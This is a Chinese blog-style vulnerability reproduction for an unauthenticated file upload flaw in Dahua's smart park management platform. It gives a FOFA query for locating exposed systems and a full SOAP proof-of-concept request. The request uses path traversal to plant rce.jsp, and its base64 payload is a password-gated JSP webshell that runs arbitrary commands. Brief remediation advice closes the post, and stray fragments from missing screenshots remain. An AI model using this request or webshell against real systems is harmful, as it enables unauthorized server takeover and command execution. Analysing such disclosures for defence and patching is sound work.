大华智慧园区综合管理平台 poi 任意文件上传漏洞复现
发布时间
阅读量:
阅读量
大华智慧园区综合管理平台是一款具备园区运营、资源调配和智能服务功能的系统,旨在优化资源分配并提升使用体验。然而,在(mapbiz.emap.dahuatech.com)/emap/webservice/gis/soap/poi接口处存在文件上传漏洞,未授权的攻击者可通过上传后门文件控制服务器权限。该漏洞可通过构造特定请求(如POST请求)并注入恶意文件(如base64编码的马子)进行复现,并配合截图验证(如FOWA值截图和验证截图)。官方已修复该漏洞,并建议用户采取防火墙设置、白名单访问等安全措施以防止此类攻击进一步发生。
0x01 产品简介
该系统 作为一款综合管理平台 运用于智慧园区领域。其核心功能 包括涵盖园区运营调度 资源调配优化以及智能化的服务功能 系统旨在优化园区资源配置 从而提高工作效率 并不仅满足多样化的管理要求 同时还能够为用户提供更加便捷的服务支持 从而提升用户体验水平
0x02 漏洞概述
大华智慧园区综合管理平台中的/emap/webservice/gis/soap/poi接口存在易受攻击的漏洞点,在未经过授权的情况下,攻击者能够上传带有后门的文件,并进而导致服务器权限被非法更改。
0x03 复现环境
FOFA:app="dahua-智慧园区综合管理平台"

0x04 漏洞复现
PoC
POST /emap/webservice/gis/soap/poi HTTP/1.1
Host: your-ip
Content-Type: text/xml;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.poi.mapbiz.emap.dahuatech.com/">
<soapenv:Header/>
<soapenv:Body>
<res:uploadPicFile>
<arg0>/../../rce.jsp</arg0>
<arg1>PCUgaWYoIjEyMyIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkpeyBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7IGludCBhID0gLTE7IGJ5dGVbXSBiID0gbmV3IGJ5dGVbMjA0OF07IG91dC5wcmludCgiPHByZT4iKTsgd2hpbGUoKGE9aW4ucmVhZChiKSkhPS0xKXsgb3V0LnByaW50bG4obmV3IFN0cmluZyhiKSk7IH0gb3V0LnByaW50KCI8L3ByZT4iKTsgfSAlPg==</arg1>
</res:uploadPicFile>
</soapenv:Body>
</soapenv:Envelope>
AI助手
PS:

验证

0x05 修复建议
官方修复了此漏洞,请用户建议他们联系厂商处理此漏洞:http://dahuatech.corp.dav01.com
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统。
全部评论 (0)
还没有任何评论哟~
